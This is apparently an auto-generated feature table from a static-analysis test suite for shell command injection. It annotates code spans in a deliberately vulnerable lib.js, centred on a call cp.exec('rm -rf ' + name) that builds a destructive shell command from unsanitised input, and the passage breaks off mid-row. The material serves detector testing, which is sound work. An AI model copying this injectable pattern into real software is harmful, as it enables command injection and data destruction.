autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:27 | cp.exec ... + name) | enclosingFunctionName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:6:135:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:6:135:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:6:135:9 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:6:135:9 | exec | enclosingFunctionName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:6:135:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:11:135:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:11:135:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:11:135:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:11:135:19 | "rm -rf " | enclosingFunctionName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:11:135:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:11:135:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:11:135:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:11:135:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:11:135:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:11:135:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:11:135:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:11:135:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:11:135:26 | "rm -rf " + name | enclosingFunctionName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:11:135:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:11:135:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:23:135:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:23:135:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:23:135:26 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:23:135:26 | name | enclosingFunctionName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:23:135:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:23:135:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:2:137:12 | constructor | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:2:137:12 | constructor | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:2:137:12 | constructor | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:2:139:2 | constru ... rted\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:2:139:2 | constru ... rted\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:2:139:2 | constru ... rted\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:2:139:2 | constru ... rted\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:2:139:2 | constru ... rted\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:2:139:2 | constru ... rted\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:137:12 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:137:12 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:137:12 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:137:12 | cp | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:137:12 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:137:12 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:137:12 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:137:12 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:137:12 | this | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:137:12 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | 'arguments' object of constructor of class Cla4 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | 'arguments' object of constructor of class Cla4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | 'arguments' object of constructor of class Cla4 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | 'arguments' object of constructor of class Cla4 | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | 'arguments' object of constructor of class Cla4 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | (name) ... rted\\n\\t} | assignedToPropName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | (name) ... rted\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | (name) ... rted\\n\\t} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | (name) ... rted\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | exceptional return of constructor of class Cla4 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | exceptional return of constructor of class Cla4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | exceptional return of constructor of class Cla4 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | exceptional return of constructor of class Cla4 | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | exceptional return of constructor of class Cla4 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | return of constructor of class Cla4 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | return of constructor of class Cla4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | return of constructor of class Cla4 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | return of constructor of class Cla4 | enclosingFunctionName | constructor | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:13:139:2 | return of constructor of class Cla4 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:137:14:137:17 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, 